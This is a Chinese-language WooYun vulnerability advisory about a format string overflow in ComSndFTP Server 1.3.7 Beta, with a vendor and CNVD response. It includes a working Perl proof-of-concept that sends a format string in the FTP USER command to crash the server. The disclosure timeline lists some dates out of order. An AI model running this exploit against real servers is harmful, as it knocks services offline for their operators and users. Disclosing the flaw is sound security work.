漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-08114
漏洞标题:ComSndFTP服务器格式化字符溢出漏洞
相关厂商:http://ftp.comsnd.com/
漏洞作者: demonalex
提交时间:2012-06-09 16:28
修复时间:2012-07-24 16:29
公开时间:2012-07-24 16:29
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:15
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-06-09: 细节已通知厂商并且等待厂商处理中
2012-06-13: 厂商已经确认,细节仅向厂商公开
2012-06-16: 细节向第三方安全合作伙伴开放
2012-08-07: 细节向核心白帽子及相关领域专家公开
2012-08-17: 细节向普通白帽子公开
2012-08-27: 细节向实习白帽子公开
2012-07-24: 细节向公众公开
简要描述:
ComSndFTP服务器(版本:1.3.7 Beta)的部分FTP指令存在格式化字符溢出漏洞,可导致拒绝服务以及执行远程系统代码的后果。
详细说明:
ComSndFTP服务器(版本:1.3.7 Beta)的USER指令存在格式化字符溢出漏洞。
漏洞证明:
Proof Of Concept :
-----------------------------------------------------------
#!/usr/bin/perl -w
#ComSndFTP Server Remote Format String Overflow Exploit
#Written by demonalex@163.com
use IO::Socket;
$|=1;
$host=shift || die "$0 \$host \$port\n";
$port=shift || die "$0 \$host \$port\n";
$evil = '%s%p%x%d';
print "Launch Attack ... ";
$sock1=IO::Socket::INET->new(PeerAddr=>$host, PeerPort=>$port, Proto=>'tcp', Timeout=>30) || die "HOST $host PORT $port is down!\n";
if(defined($sock1)){
$sock1->recv($content, 100, 0);
sleep(2);
$sock1->send("USER ".$evil."\r\n", 0);
sleep(2);
$sock1->recv($content, 100, 0);
sleep(5);
$sock1->close;
}
print "Finish!\n";
exit(1);
-----------------------------------------------------------
修复方案:
使用安全的函数进行数据处理。
版权声明:转载请注明来源 demonalex@乌云
漏洞回应
厂商回应:
危害等级:中
漏洞Rank:10
确认时间:2012-06-13 16:58
厂商回复:
CNVD确认漏洞情况,demonalex同学还是一如继往的在溢出漏洞方面进行研究。
对漏洞评分如下:
CVSS:(AV:R/AC:L/Au:NR/C:P/A:C/I:N/B:N) score:8.47(最高10分,高危)
即:远程攻击、攻击难度低、不需要用户认证,对可用性构成完全影响,对机密性构成部分影响(本身是否root权限暂未认定)。
技术难度系数:1.0
影响危害系数:1.2(以一般影响评估,涉及客户未知)
CNVD综合评分:8.47*1.0*1.2=10.164
最新状态:
暂无